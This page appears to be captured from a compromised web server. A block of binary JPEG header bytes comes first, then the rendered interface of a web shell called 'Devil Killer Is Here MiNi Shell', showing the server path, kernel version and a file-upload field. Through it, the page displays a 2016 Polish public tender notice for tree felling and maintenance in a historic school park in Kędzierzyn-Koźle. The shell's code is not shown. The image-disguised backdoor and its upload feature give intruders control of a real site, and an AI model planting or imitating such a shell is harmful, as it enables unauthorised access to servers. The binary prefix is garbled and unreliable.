JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160518/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160518/126470-N-2016.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Uprządkowanie i prace pielęgnacyjne drzewostanu parku zabytkowego przy Zespole Szkół Nr 3 przy ul. Sławięcickiej 79 w Kędzierzynie-Koźlu- etap II</b><br>
<b>Numer ogłoszenia: 126470 - 2016; data zamieszczenia: 18.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 3 im. Mikołaja Reja , ul. Sławięcicka 79, 47-230 Kędzierzyn-Koźle, woj. opolskie, tel. 77 483 49 93, faks 77 483 49 93.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slawiecice.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uprządkowanie i prace pielęgnacyjne drzewostanu parku zabytkowego przy Zespole Szkół Nr 3 przy ul. Sławięcickiej 79 w Kędzierzynie-Koźlu- etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie prac uporządkowania i pielęgnacji drzewostanu na terenie Parku Sławięcickiego wpisanego do rejestru zabytków decyzją z dnia 21 kwietnia 1964r. nr 832/64 i P-25/57 z dnia 20.12.1957r. polegających na: 
- wycince drzewostanu, 
- pielęgnacji i korekty koron drzew,
- wykonaniu wiązań elastycznych drzewostanu,
- wykonaniu zabiegów leczniczych drzewostanu, 
- wycince samosiejek
zgodnie z:
- Decyzją Opolskiego Wojewódzkiego Konserwatora Zabytków w Opolu, nr WUOZ 520/N/2015, z dnia 04.08.2015 stanowiącej załącznik nr 1 do SIWZ.
- Szczegółową inwentaryzacją dendrologiczną stanowiącą załącznik nr 2 do SIWZ.
- Wykazem drzew: (zestawienie drzew do pielęgnacji, zestawienie drzew do usunięcia  stanowiący załącznik nr 3a i 3b do SIWZ.
- Mapą określająca obszar działań stanowiącą załącznik nr 4 do SIWZ.
Wycinka drzew wraz z wywożeniem ,zrębkowanie gałęzi na odległość do 2 km - jeśli wykonawca nie zagospodaruje w inny sposób gałęzi i konarów we własnym zakresie - 122 drzew.
2. Pielęgnacja drzew - wykonanie cięć sanitarnych, korygujących i technicznych - polegające na odcięciu piłą mechaniczną, piłką ręczną, sekatorem gałęzi i konarów drzewa oraz opuszczeniu ich na linach - 229 drzew: 
- cięcia  pielęgnacyjne w tym sanitarne i prześwietlające - cięcie gałęzi i konarów poprawiające warunki rozwoju korony drzew. Obejmujące cięcie sanitarne eliminujące z korony drzewa pędy, gałęzie i konary chore i martwe, uszkodzone, połamane, stanowiące źródło infekcji, a także usuwanie odrostów korzeniowych;
- cięcia korygujące - polegające na niwelowaniu wad budowy korony drzewa, poprawiające statykę drzewa lub zapobiegające rozłamaniom, w tym redukcja i odciążenie konarów lub korony drzewa, usunięcie krzyżujących się konarów, gałęzi, usuwanie wady wielopniowości; 
- cięcia techniczne koron cięcia nieprzyrodnicze wymuszone kolizją korony drzewa z innymi obiektami;
- wycinka samosiejek na obejmującym zadanie terenie 
- wywożenie zrębkowanie gałęzi na odległość do 2 km - jeśli wykonawca nie zagospodaruje w inny sposób gałęzi 
i konarów we własnym zakresie; 
założenie wiązań elastycznych:
Pod pojęciem: wiązań elastycznych opasowych Zamawiający określił wiązania spełniające następujące wymogi techniczne:
 - Użyty system powinien cechować się możliwością samoregulacji wraz z przyrostem pni na grubość oraz mieć możliwość instalowania jako wiązanie statyczne lub dynamiczne ze zintegrowanym amortyzatorem. System winien być koloru czarnego lub innego, nie kontrastującego z kolorem kory drzew. Dopuszcza się stosowanie tylko i wyłącznie lin polipropylenowych o współczynniku rozciągliwości 15-20% i wytrzymałości podanej przez producenta systemu np.: 2; 4 lub 8 ton, dostosowanej do potrzeb. Ponadto muszą być odporne na działanie promieniowania ultrafioletowego, dopuszczając możliwość degradacji ich wytrzymałości pierwotnej do 2% rocznie, o rekomendowanym minimum ośmioletnim okresie użytkowania. 
- System wiązań musi być kompletowany i instalowany zgodnie z instrukcją opracowaną przez producenta oraz zgodnej z zaleceniami europejskich organizacji branżowych. Niedopuszczalnym jest stosowanie wiązań kompletowanych z elementów systemu pochodzących od różnych producentów.Jakakolwiek ingerencja w strukturę Parku - jego drzewostan, ukształtowanie, nasadzenia roślinności, zabudowę 
i założone instalacje - może być wykonywana wyłącznie w uzgodnieniu z Inspektorem Nadzoru oraz przedstawicielem Zamawiającego. Prace pielęgnacyjne drzew, stanowiące przedmiot Zamówienia, winny być wykonywane w taki sposób, aby nie naruszyć istniejącej roślinności oraz urządzeń, instalacji i zabudowy w bezpośrednim otoczeniu pielęgnowanego drzewa i na szlakach komunikacyjnych wywozu gałęzi, konarów itp. oraz na terenie całego Parku. Ze względu na codzienne i całodzienne udostępnianie Parku zwiedzającym prace winny być zorganizowane w sposób nie zagrażający zwiedzającym Parku, a drewno z prac pielęgnacyjnych winno być natychmiast usuwane z terenu obiektu
Zamawiający wskazuje, na podstawie wymagań Inspektora Nadzoru prowadzącego nadzór pielęgnacyjny drzewostanu w Parku, na możliwość użycia podnośników koszowych tylko na terenie dróg utwardzonych, podstawową techniką pielęgnacji drzew będzie technika z lin a także na użycie do wycinania gałęzi narzędzi ręcznych. Wszelkie prace pielęgnacyjne i wycinkowe oraz transportowe winny być przeprowadzane lekkim sprzętem ciągniki 
i przyczepy o dopuszczalnej masie całkowitej do 3,5 t.Osoby realizujące zamówienie muszą posiadać specjalistyczne ubrania robocze i ochronne z logo firmy wykonawcy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie złożonego oświadczenia przez Wykonawcę wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o dotychczasowe realizowane zamówienia. 
Zamawiający uzna warunek posiadania wiedzy i doświadczenia za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie wykonał conajmniej a)2 usług w zakresie przeprowadzonych prac pielęgnacyjnych cięcia korygujące, sanitarne, techniczne, formujące w koronach drzew) na drzewostanie w założeniach parkowych lub innej zieleni zorganizowanej, wpisanych do rejestru zabytków - w liczbie co najmniej 500 drzew łącznie w obu zamówieniach, o łącznej wartości obu usług nie mniejszej niż 200 000,00 zł brutto.  
b)	2 usług obejmujących wykonywanie, co najmniej 20 wiązań elastycznych w koronach drzew w założeniach parkowych lub innej zieleni zorganizowanej, wpisanych do rejestru zabytków lub drzewach pomnikach przyrody 
o wartości usługi nie mniejszej niż 20.000,00zł brutto.Wykonawca potwierdza spełnienie ww. warunku składając wraz z ofert wykaz wykonanych usług - druk nr 6</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dopkona oceny spełnienia warunków na podstawie złożonych dokumentów wymienionych w pkt.6 niniejszej SIWZ na zasadzie spełnia/nie spełnia.2. Zamawiający żąda, aby Wykonawca w celu spełnienia warunków udziału w postępowaniu złożył wszystkie dokumenty i oświadczenia wymienione w pkt. 6 niniejszej SIWZ. 3.Zamawiający uzna wymienione poniżej warunki udziału w postępowaniu za spełnione na podstawie oświadczeń i dokumentów wymienionych i opisanych w specyfikacji oraz złożonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia za spełniony jeżeli wykonawca wykaże, że dysponuje, lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone, a niezbędnymi do wykonania zamówienia. Wykonawca przedstawi 
w wykazie wraz z ofertą osoby, na każdą z wymienionych funkcji wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia oraz zakresie wykonywanych przez nie czynności i podstawie do dysponowania tymi osobami, spełniającymi poniższe wymagania:-  kadra kierowniczo - inżynierska:
a) minimalna liczba osób: 2
b) minimalne kwalifikacje zawodowe i doświadczenie:
- tytuł magistra lub magistra inżyniera uzyskany po ukończeniu studiów wyższych kierunkowych: ogrodnictwo lub leśnictwo lub kształtowanie terenów zieleni, w tym, co najmniej posiadającą kwalifikacje i doświadczenie zawodowe [12- miesięczną praktykę zawodową] do prowadzenia tych prac na terenach wpisanych do rejestru zabytków, w tym zabytkowych terenów zieleni (wymogi w tym zakresie sformułowano w § 23 ust. 1 lub § 31 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 Nr 165, poz. 987), 
- ukończony specjalistyczny kurs III stopnia NOT w zakresie pielęgnacji drzew lub Inspektor Nadzoru Robót Arborystycznych z doświadczeniem min. 10-letnim w kierowaniu pracami o takim samym charakterze, w tym w obiekcie wpisanym do rejestru zabytków, z przygotowaniem zawodowym obejmującym wiadomości 
z zakresu pielęgnacji zieleni. 
c) Kadra kierownicza obecna jest na terenie Parku przez cały okres wykonywania przedmiotu zamówieniakadrą techniczna: 
a) minimalna liczba osób: 2
b) minimalne kwalifikacje zawodowe i doświadczenie:
- posiadające świadectwo ukończenia minimum szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający kwalifikacje zawodowe w zawodach związanych z pielęgnacją zieleni (ogrodnictwo lub leśnictwo lub kształtowanie terenów zieleni), z co najmniej 6 - letnią praktyką zawodową i odbytą co najmniej 12- miesięczną praktyką zawodową przy pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków, 
- posiadające ukończony kurs pielęgnacji drzew technikami arborystycznymi (z lin), np.: II stopnia NOT pielęgnacji drzew lub Europen Treeworker lub równoważne, 
- posiadające uprawnienia do obsługi pił motorowych lub np. potwierdzone ukończenie kursu obsługi pilarek oraz posiadające aktualne zaświadczenia lekarskie dopuszczające do pracy na wysokości powyżej 3,5 m. 
c) Kadra techniczna - są obecni na terenie Parku przez cały okres wykonywania przedmiotu zamówienia.

- kadra pracownicza do prac pielęgnacyjnych i wycinania drzew:
a) minimalna liczba osób: 5
b) minimalne kwalifikacje zawodowe i doświadczenie:
- min. 4- letnia praktyka zawodowa,
- min. 12- miesięczną praktykę zawodową, przy pielęgnacji tego rodzaju obiektów, wpisanych do rejestru zabytków, przewidywanymi do pracy piłą motorową,
- posiadające min. wykształcenie zawodowe (ogrodnicze lub leśne)
- posiadające ukończony kurs pielęgnacji drzew technikami arborystycznymi (z lin), np.: II stopnia NOT pielęgnacji drzew lub Europen Treeworker lub równoważne, 
- posiadające uprawnienia do obsługi pił motorowych lub np. potwierdzone ukończenie kursu obsługi pilarek oraz posiadających aktualne zaświadczenia lekarskie dopuszczające do pracy na wysokości powyżej 3,5 m;


- kadra pracownicza do prac pielęgnacyjnych i wycinania drzew:
a) minimalna liczba osób: 4
b) minimalne kwalifikacje zawodowe i doświadczenie:
- min. 5-letnia praktyka zawodowa,
- min. 12- miesięczną praktykę zawodową, przy pielęgnacji tego rodzaju obiektów, wpisanych do rejestru zabytków;
- ukończony kurs pielęgnacji drzew technikami arborystycznymi (z lin), np.: II stopnia NOT pielęgnacji drzew lub Europen Treeworker lub równoważne, 
- posiadające uprawnienia UDT dopuszczające do pracy w koszu na podestach ruchomych na samochodach,
- posiadające ukończony kurs obsługi sprzętu mechanicznego (piły),
- posiadające aktualne badania lekarskie dopuszczające do pracy na wysokości powyżej 3,5 m i pracy piłą spalinową.

- kadra pracownicza do prac wycinania drzew:
a) minimalna liczba osób: 3
b) minimalne kwalifikacje zawodowe i doświadczenie:
- min. 5-letnia praktyka zawodowa,
- min. 12- miesięczna praktyka zawodowa, przy wycinaniu drzew w tego rodzaju obiektach, wpisanych do rejestru zabytków, przewidywanymi do pracy piłą motorową,
- posiadające uprawnienia do obsługi pił motorowych lub np. potwierdzone ukończenie kursu obsługi pilarek.Wykonawca wykonując przedmiot zamówienia będzie posługiwał się osobami wskazanymi w załączonym do oferty wykazie, jako personel Wykonawcy. Osoby wpisane na listę będą wiążące, jako personel Wykonawcy do wykonywania prac. Istnieje możliwość zastępstwa w/w osób, ale muszą one się wykazać, co najmniej takimi samymi uprawnieniami oraz doświadczeniem i wiedzą jak osoby wskazane w ofercie. Wykaz osób w zastępstwie będzie zgłaszany przez Wykonawcę prac i każdorazowo uzgadniany z Zamawiającym i Inspektorem Nadzoru przed dopuszczeniem do prac na terenie Parku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się posiadaniem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wartości nie mniejszej niż 200 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków na zasadach określonych w art. 26 ust. 2b ustawy Pzp. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie (druk nr 8) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy, ubiegającemu się o zamówienie odpowiedniego zasobu oraz wskazywać:
a)	jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu,
b)	w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez wykonawcę, przy wykonaniu zamówienia,
c)	jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem,
d)	jaki jest zakres i w jakim okresie inny podmiot będzie brał  udział  przy wykonywaniu zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Poświadczenia , z tym że  w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, lub oświadczenie wykonawcy-jeżeli z uzasadnionych  przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1. a) w przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w pkt6 ppkt 2 SIWZ, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej budzą wątpliwości lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie  nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu na rzecz, którego usługi były wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - Termin wykonania zamówienia - 0.1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
